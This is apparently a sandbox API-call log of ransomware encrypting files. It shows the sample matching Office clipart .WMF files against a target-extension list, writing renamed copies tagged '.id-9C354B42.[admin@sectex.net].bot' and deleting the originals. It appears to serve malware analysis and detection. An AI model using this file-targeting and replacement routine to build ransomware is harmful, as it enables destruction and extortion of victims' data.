	[0161.576] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107342.WMF") returned 63
	[0161.576] lstrlenW (lpString=".jpg") returned 4
	[0161.576] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1
	[0161.577] lstrcmpiW (lpString1=".WMF", lpString2=".bot") returned 1
	[0161.577] lstrlenW (lpString="J0107446.WMF") returned 12
	[0161.577] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107446.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0107446.wmf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1d8
	[0161.577] GetFileSizeEx (in: hFile=0x1d8, lpFileSize=0xa68ff1c | out: lpFileSize=0xa68ff1c*=30336) returned 1
	[0161.577] CloseHandle (hObject=0x1d8) returned 1
	[0161.577] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107446.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0107446.wmf")) returned 0x20
	[0161.577] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107446.WMF.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0107446.wmf.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0161.578] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107446.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0107446.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1d8
	[0161.578] SetFilePointerEx (in: hFile=0x1d8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa68fec8 | out: lpNewFilePointer=0x0) returned 1
	[0161.578] SetFilePointerEx (in: hFile=0x1d8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa68fec8 | out: lpNewFilePointer=0x0) returned 1
	[0161.578] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107446.WMF.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0107446.wmf.id-9c354b42.[admin@sectex.net].bot"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x25c
	[0161.579] GetLastError () returned 0x0
	[0161.579] ReadFile (in: hFile=0x1d8, lpBuffer=0xb180020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa68fed4, lpOverlapped=0x0 | out: lpBuffer=0xb180020*, lpNumberOfBytesRead=0xa68fed4*=0x7680, lpOverlapped=0x0) returned 1
	[0161.583] WriteFile (in: hFile=0x25c, lpBuffer=0xb180020*, nNumberOfBytesToWrite=0x7690, lpNumberOfBytesWritten=0xa68fc9c, lpOverlapped=0x0 | out: lpBuffer=0xb180020*, lpNumberOfBytesWritten=0xa68fc9c*=0x7690, lpOverlapped=0x0) returned 1
	[0161.584] ReadFile (in: hFile=0x1d8, lpBuffer=0xb180020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa68fed4, lpOverlapped=0x0 | out: lpBuffer=0xb180020*, lpNumberOfBytesRead=0xa68fed4*=0x0, lpOverlapped=0x0) returned 1
	[0161.584] WriteFile (in: hFile=0x25c, lpBuffer=0xb180020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0xa68fc9c, lpOverlapped=0x0 | out: lpBuffer=0xb180020*, lpNumberOfBytesWritten=0xa68fc9c*=0xec, lpOverlapped=0x0) returned 1
	[0161.585] SetEndOfFile (hFile=0x25c) returned 1
	[0161.585] CloseHandle (hObject=0x25c) returned 1
	[0161.585] SetFilePointerEx (in: hFile=0x1d8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa68fec8 | out: lpNewFilePointer=0x0) returned 1
	[0161.585] SetEndOfFile (hFile=0x1d8) returned 1
	[0161.587] CloseHandle (hObject=0x1d8) returned 1
	[0161.587] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107446.WMF.id-9C354B42.[admin@sectex.net].bot", dwFileAttributes=0x20) returned 1
	[0161.588] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107446.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0107446.wmf")) returned 1
	[0161.588] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107446.WMF") returned 63
	[0161.588] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107446.WMF") returned 63
	[0161.588] lstrlenW (lpString=".doc") returned 4
	[0161.588] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1
	[0161.588] lstrlenW (lpString=".docx") returned 5
	[0161.588] lstrcmpiW (lpString1=".docx", lpString2="6.WMF") returned -1
	[0161.588] lstrlenW (lpString=".pdf") returned 4
	[0161.588] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1
	[0161.588] lstrlenW (lpString=".xls") returned 4
	[0161.588] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1
	[0161.588] lstrlenW (lpString=".xlsx") returned 5
	[0161.589] lstrcmpiW (lpString1=".xlsx", lpString2="6.WMF") returned -1
	[0161.589] lstrlenW (lpString=".ppt") returned 4
	[0161.589] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1
	[0161.589] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107446.WMF") returned 63
	[0161.589] lstrlenW (lpString=".zip") returned 4
	[0161.589] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1
	[0161.589] lstrlenW (lpString=".rar") returned 4
	[0161.589] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1
	[0161.589] lstrlenW (lpString=".bz2") returned 4
	[0161.589] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1
	[0161.589] lstrlenW (lpString=".7z") returned 3
	[0161.589] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1
	[0161.589] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107446.WMF") returned 63
	[0161.589] lstrlenW (lpString=".dbf") returned 4
	[0161.589] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1
	[0161.589] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107446.WMF") returned 63
	[0161.589] lstrlenW (lpString=".1cd") returned 4
	[0161.589] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1
	[0161.589] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107446.WMF") returned 63
	[0161.589] lstrlenW (lpString=".jpg") returned 4
	[0161.589] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1
	[0161.589] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107446.WMF") returned 63
	[0161.589] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107446.WMF") returned 63
	[0161.589] lstrlenW (lpString=".doc") returned 4
	[0161.589] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1
	[0161.589] lstrlenW (lpString=".docx") returned 5
	[0161.589] lstrcmpiW (lpString1=".docx", lpString2="6.WMF") returned -1
	[0161.589] lstrlenW (lpString=".pdf") returned 4
	[0161.589] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1
	[0161.589] lstrlenW (lpString=".xls") returned 4
	[0161.590] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1
	[0161.590] lstrlenW (lpString=".xlsx") returned 5
	[0161.590] lstrcmpiW (lpString1=".xlsx", lpString2="6.WMF") returned -1
	[0161.590] lstrlenW (lpString=".ppt") returned 4
	[0161.590] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1
	[0161.590] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107446.WMF") returned 63
	[0161.590] lstrlenW (lpString=".zip") returned 4
	[0161.590] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1
	[0161.590] lstrlenW (lpString=".rar") returned 4
	[0161.590] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1
	[0161.590] lstrlenW (lpString=".bz2") returned 4
	[0161.590] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1
	[0161.590] lstrlenW (lpString=".7z") returned 3
	[0161.590] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1
	[0161.590] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107446.WMF") returned 63
	[0161.590] lstrlenW (lpString=".dbf") returned 4
	[0161.590] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1
	[0161.590] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107446.WMF") returned 63
	[0161.590] lstrlenW (lpString=".1cd") returned 4
	[0161.590] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1
	[0161.590] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107446.WMF") returned 63
	[0161.590] lstrlenW (lpString=".jpg") returned 4
	[0161.590] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1
	[0161.590] lstrcmpiW (lpString1=".WMF", lpString2=".bot") returned 1
	[0161.590] lstrlenW (lpString="J0107450.WMF") returned 12
	[0161.590] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107450.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0107450.wmf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x37c
	[0162.195] GetFileSizeEx (in: hFile=0x37c, lpFileSize=0xa68ff1c | out: lpFileSize=0xa68ff1c*=4920) returned 1
	[0162.195] CloseHandle (hObject=0x37c) returned 1
	[0162.195] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107450.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0107450.wmf")) returned 0x20
	[0162.195] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107450.WMF.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0107450.wmf.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0162.195] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107450.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0107450.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x37c
	[0162.196] SetFilePointerEx (in: hFile=0x37c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa68fec8 | out: lpNewFilePointer=0x0) returned 1
	[0162.196] SetFilePointerEx (in: hFile=0x37c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa68fec8 | out: lpNewFilePointer=0x0) returned 1
	[0162.196] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107450.WMF.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0107450.wmf.id-9c354b42.[admin@sectex.net].bot"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3b8
	[0162.196] GetLastError () returned 0x0
	[0162.196] ReadFile (in: hFile=0x37c, lpBuffer=0xb180020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa68fed4, lpOverlapped=0x0 | out: lpBuffer=0xb180020*, lpNumberOfBytesRead=0xa68fed4*=0x1338, lpOverlapped=0x0) returned 1
	[0162.198] WriteFile (in: hFile=0x3b8, lpBuffer=0xb180020*, nNumberOfBytesToWrite=0x1340, lpNumberOfBytesWritten=0xa68fc9c, lpOverlapped=0x0 | out: lpBuffer=0xb180020*, lpNumberOfBytesWritten=0xa68fc9c*=0x1340, lpOverlapped=0x0) returned 1
	[0162.199] ReadFile (in: hFile=0x37c, lpBuffer=0xb180020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa68fed4, lpOverlapped=0x0 | out: lpBuffer=0xb180020*, lpNumberOfBytesRead=0xa68fed4*=0x0, lpOverlapped=0x0) returned 1
	[0162.199] WriteFile (in: hFile=0x3b8, lpBuffer=0xb180020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0xa68fc9c, lpOverlapped=0x0 | out: lpBuffer=0xb180020*, lpNumberOfBytesWritten=0xa68fc9c*=0xec, lpOverlapped=0x0) returned 1
	[0162.199] SetEndOfFile (hFile=0x3b8) returned 1
	[0162.199] CloseHandle (hObject=0x3b8) returned 1
	[0162.199] SetFilePointerEx (in: hFile=0x37c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa68fec8 | out: lpNewFilePointer=0x0) returned 1
	[0162.199] SetEndOfFile (hFile=0x37c) returned 1
	[0162.452] CloseHandle (hObject=0x37c) returned 1
	[0162.452] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107450.WMF.id-9C354B42.[admin@sectex.net].bot", dwFileAttributes=0x20) returned 1
	[0162.481] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107450.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0107450.wmf")) returned 1
	[0162.525] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107450.WMF") returned 63
	[0162.525] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107450.WMF") returned 63
	[0162.525] lstrlenW (lpString=".doc") returned 4
	[0162.525] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1
	[0162.525] lstrlenW (lpString=".docx") returned 5
	[0162.525] lstrcmpiW (lpString1=".docx", lpString2="0.WMF") returned -1
	[0162.525] lstrlenW (lpString=".pdf") returned 4
	[0162.526] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1
	[0162.526] lstrlenW (lpString=".xls") returned 4
	[0162.526] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1
	[0162.526] lstrlenW (lpString=".xlsx") returned 5
	[0162.526] lstrcmpiW (lpString1=".xlsx", lpString2="0.WMF") returned -1
	[0162.526] lstrlenW (lpString=".ppt") returned 4
	[0162.526] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1
	[0162.526] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107450.WMF") returned 63
	[0162.526] lstrlenW (lpString=".zip") returned 4
	[0162.526] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1
	[0162.526] lstrlenW (lpString=".rar") returned 4
	[0162.526] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1
	[0162.526] lstrlenW (lpString=".bz2") returned 4
	[0162.526] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1
	[0162.526] lstrlenW (lpString=".7z") returned 3
	[0162.526] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1
	[0162.526] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107450.WMF") returned 63
	[0162.526] lstrlenW (lpString=".dbf") returned 4
	[0162.526] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1
	[0162.526] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107450.WMF") returned 63
	[0162.526] lstrlenW (lpString=".1cd") returned 4
	[0162.526] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1
	[0162.526] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107450.WMF") returned 63
	[0162.526] lstrlenW (lpString=".jpg") returned 4
	[0162.526] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1
	[0162.526] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107450.WMF") returned 63
	[0162.526] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107450.WMF") returned 63
	[0162.526] lstrlenW (lpString=".doc") returned 4
	[0162.526] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1
	[0162.526] lstrlenW (lpString=".docx") returned 5
	[0162.526] lstrcmpiW (lpString1=".docx", lpString2="0.WMF") returned -1
	[0162.526] lstrlenW (lpString=".pdf") returned 4
	[0162.527] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1
	[0162.527] lstrlenW (lpString=".xls") returned 4
	[0162.527] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1
	[0162.527] lstrlenW (lpString=".xlsx") returned 5
	[0162.527] lstrcmpiW (lpString1=".xlsx", lpString2="0.WMF") returned -1
	[0162.527] lstrlenW (lpString=".ppt") returned 4
	[0162.527] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1
	[0162.527] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107450.WMF") returned 63
	[0162.527] lstrlenW (lpString=".zip") returned 4
	[0162.527] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1
	[0162.527] lstrlenW (lpString=".rar") returned 4
	[0162.527] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1
	[0162.527] lstrlenW (lpString=".bz2") returned 4
	[0162.527] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1
	[0162.527] lstrlenW (lpString=".7z") returned 3
	[0162.527] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1
	[0162.527] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107450.WMF") returned 63
	[0162.527] lstrlenW (lpString=".dbf") returned 4
	[0162.527] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1
	[0162.527] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107450.WMF") returned 63
	[0162.527] lstrlenW (lpString=".1cd") returned 4
	[0162.527] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1
	[0162.527] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107450.WMF") returned 63
	[0162.527] lstrlenW (lpString=".jpg") returned 4
	[0162.527] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1
	[0162.527] lstrcmpiW (lpString1=".WMF", lpString2=".bot") returned 1
	[0162.527] lstrlenW (lpString="J0107708.WMF") returned 12
	[0162.527] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107708.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0107708.wmf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3d0
	[0162.529] GetFileSizeEx (in: hFile=0x3d0, lpFileSize=0xa68ff1c | out: lpFileSize=0xa68ff1c*=4808) returned 1
	[0162.529] CloseHandle (hObject=0x3d0) returned 1
	[0162.529] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107708.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0107708.wmf")) returned 0x20
	[0162.529] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107708.WMF.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0107708.wmf.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0162.529] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107708.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0107708.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3d0
	[0162.529] SetFilePointerEx (in: hFile=0x3d0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa68fec8 | out: lpNewFilePointer=0x0) returned 1
	[0162.529] SetFilePointerEx (in: hFile=0x3d0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa68fec8 | out: lpNewFilePointer=0x0) returned 1
	[0162.530] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107708.WMF.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0107708.wmf.id-9c354b42.[admin@sectex.net].bot"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1b4
	[0163.040] GetLastError () returned 0x0
	[0163.040] ReadFile (in: hFile=0x3d0, lpBuffer=0xb180020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa68fed4, lpOverlapped=0x0 | out: lpBuffer=0xb180020*, lpNumberOfBytesRead=0xa68fed4*=0x12c8, lpOverlapped=0x0) returned 1
	[0163.042] WriteFile (in: hFile=0x1b4, lpBuffer=0xb180020*, nNumberOfBytesToWrite=0x12d0, lpNumberOfBytesWritten=0xa68fc9c, lpOverlapped=0x0 | out: lpBuffer=0xb180020*, lpNumberOfBytesWritten=0xa68fc9c*=0x12d0, lpOverlapped=0x0) returned 1
	[0163.043] ReadFile (in: hFile=0x3d0, lpBuffer=0xb180020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa68fed4, lpOverlapped=0x0 | out: lpBuffer=0xb180020*, lpNumberOfBytesRead=0xa68fed4*=0x0, lpOverlapped=0x0) returned 1
	[0163.043] WriteFile (in: hFile=0x1b4, lpBuffer=0xb180020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0xa68fc9c, lpOverlapped=0x0 | out: lpBuffer=0xb180020*, lpNumberOfBytesWritten=0xa68fc9c*=0xec, lpOverlapped=0x0) returned 1
	[0163.043] SetEndOfFile (hFile=0x1b4) returned 1
	[0163.043] CloseHandle (hObject=0x1b4) returned 1
	[0163.044] SetFilePointerEx (in: hFile=0x3d0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa68fec8 | out: lpNewFilePointer=0x0) returned 1
	[0163.044] SetEndOfFile (hFile=0x3d0) returned 1
	[0163.046] CloseHandle (hObject=0x3d0) returned 1
	[0163.046] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107708.WMF.id-9C354B42.[admin@sectex.net].bot", dwFileAttributes=0x20) returned 1
	[0163.047] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107708.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0107708.wmf")) returned 1
	[0163.048] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107708.WMF") returned 63
	[0163.048] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107708.WMF") returned 63
	[0163.048] lstrlenW (lpString=".doc") returned 4
	[0163.048] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1
	[0163.048] lstrlenW (lpString=".docx") returned 5
	[0163.048] lstrcmpiW (lpString1=".docx", lpString2="8.WMF") returned -1
	[0163.048] lstrlenW (lpString=".pdf") returned 4
	[0163.048] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1
	[0163.048] lstrlenW (lpString=".xls") returned 4
	[0163.048] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1
	[0163.048] lstrlenW (lpString=".xlsx") returned 5
	[0163.048] lstrcmpiW (lpString1=".xlsx", lpString2="8.WMF") returned -1
	[0163.048] lstrlenW (lpString=".ppt") returned 4
	[0163.048] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1
	[0163.049] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107708.WMF") returned 63
	[0163.049] lstrlenW (lpString=".zip") returned 4
	[0163.049] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1
	[0163.049] lstrlenW (lpString=".rar") returned 4
	[0163.049] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1
	[0163.049] lstrlenW (lpString=".bz2") returned 4
	[0163.049] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1
	[0163.049] lstrlenW (lpString=".7z") returned 3
	[0163.049] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1
	[0163.049] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107708.WMF") returned 63
	[0163.049] lstrlenW (lpString=".dbf") returned 4
	[0163.049] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1
	[0163.049] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107708.WMF") returned 63
	[0163.049] lstrlenW (lpString=".1cd") returned 4
	[0163.049] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1
	[0163.049] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107708.WMF") returned 63
	[0163.049] lstrlenW (lpString=".jpg") returned 4
	[0163.049] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1
	[0163.049] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107708.WMF") returned 63
	[0163.049] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107708.WMF") returned 63
	[0163.049] lstrlenW (lpString=".doc") returned 4
	[0163.049] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1
	[0163.049] lstrlenW (lpString=".docx") returned 5
	[0163.049] lstrcmpiW (lpString1=".docx", lpString2="8.WMF") returned -1
	[0163.049] lstrlenW (lpString=".pdf") returned 4
	[0163.049] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1
	[0163.049] lstrlenW (lpString=".xls") returned 4
	[0163.049] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1
	[0163.049] lstrlenW (lpString=".xlsx") returned 5
	[0163.049] lstrcmpiW (lpString1=".xlsx", lpString2="8.WMF") returned -1
	[0163.049] lstrlenW (lpString=".ppt") returned 4
	[0163.049] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1
	[0163.050] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107708.WMF") returned 63
	[0163.050] lstrlenW (lpString=".zip") returned 4
	[0163.050] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1
	[0163.050] lstrlenW (lpString=".rar") returned 4
	[0163.050] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1
	[0163.050] lstrlenW (lpString=".bz2") returned 4
	[0163.050] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1
	[0163.050] lstrlenW (lpString=".7z") returned 3
	[0163.050] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1
	[0163.050] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107708.WMF") returned 63
	[0163.050] lstrlenW (lpString=".dbf") returned 4
	[0163.050] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1
	[0163.050] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107708.WMF") returned 63
	[0163.050] lstrlenW (lpString=".1cd") returned 4
	[0163.050] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1
	[0163.050] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107708.WMF") returned 63
	[0163.050] lstrlenW (lpString=".jpg") returned 4
	[0163.050] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1
	[0163.050] lstrcmpiW (lpString1=".WMF", lpString2=".bot") returned 1
	[0163.050] lstrlenW (lpString="J0107712.WMF") returned 12
